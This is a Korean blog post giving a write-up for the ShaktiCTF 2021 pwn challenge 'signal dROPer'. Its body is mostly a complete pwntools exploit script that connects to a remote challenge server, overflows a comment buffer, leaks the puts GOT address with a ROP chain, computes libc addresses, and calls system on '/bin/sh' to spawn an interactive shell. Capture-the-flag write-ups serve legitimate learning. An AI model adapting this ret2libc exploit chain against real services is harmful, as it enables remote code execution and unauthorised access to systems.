[shakti CTF2021] signal dROPer

sangjun

·

2021. 4. 12. 00:05

반응형

문제소스

chall (5)
0.01MB

 

 

보호기법

 

 

문제 분석 및 페이로드

shaki.txt
0.00MB

문제 분석 text file은 살아있으나

아이다 데이터베이스 파일이 날라가서 죄송합니다ㅠㅠㅠ

익스플로잇 코드를 보시면 이해가 빠르실 겁니다.

from pwn import *
#context.log_level='critical'
context.log_level='debug'
#p=process("./chall")
e=ELF("./chall")
puts_plt=e.plt['puts']
puts_got=e.got['puts']
pr=0x0000000000400c03 #pop rdi; ret;
dns,port="34.121.211.139", 2222
p=remote(dns,port)
for i in range(13):
    p.sendlineafter("Your Choice > ",str(1))
    p.sendlineafter("Green Signal, write whaterver you want to: ",str(4))

    p.sendlineafter("Your Choice > ",str(2))
    p.sendlineafter("Enter the vehicle id: ",str(0))
    p.sendlineafter("Yellow Signal, write for your vehicle:",str(1024))

p.sendlineafter("Your Choice > ",str(3))
p.sendlineafter("Enter the vehicle id: ",str(1))
p.sendlineafter("Do you have any comments?\n",str(1))
#leak plt_got and return to menu 3
pay="A"*0x40
pay+="B"*8
pay+=p64(pr)
pay+=p64(puts_got)
pay+=p64(puts_plt)
pay+=p64(0x4008e7)#menu 3
p.sendlineafter("Please enter your comments\n",pay)
leak=u64(p.recvline()[:-1].ljust(8,"\x00"))
base=leak-0x80aa0
system=base+0x4f550
sh_addr=base+0x1b3e1a
print "puts_got leak="+hex(leak)
#menu 3 and execute system function

pay2="A"*0x40
pay2+="B"*8
pay2+=p64(pr)
pay2+=p64(sh_addr)
pay2+=p64(0x000000000040061e)#ret
pay2+=p64(system)
p.sendlineafter("Enter the vehicle id: ",str(1))
p.sendlineafter("Do you have any comments?\n",str(1))
p.sendlineafter("Please enter your comments\n",pay2)
p.interactive()

 

반응형

'War Games > ctf-review' 카테고리의 다른 글

[zh3r0 CTF 2021] more-printf  (0) 2021.06.07
[dctf 2021] Formats last theorem  (0) 2021.05.19
[OMH CTF2021] Framed  (0) 2021.05.17
[dctf2021] baby_bof  (0) 2021.05.17
[shakti CTF2021] signal dROPer  (0) 2021.04.12
[AngstromCTF2021] stickystacks  (0) 2021.04.06

0개의 댓글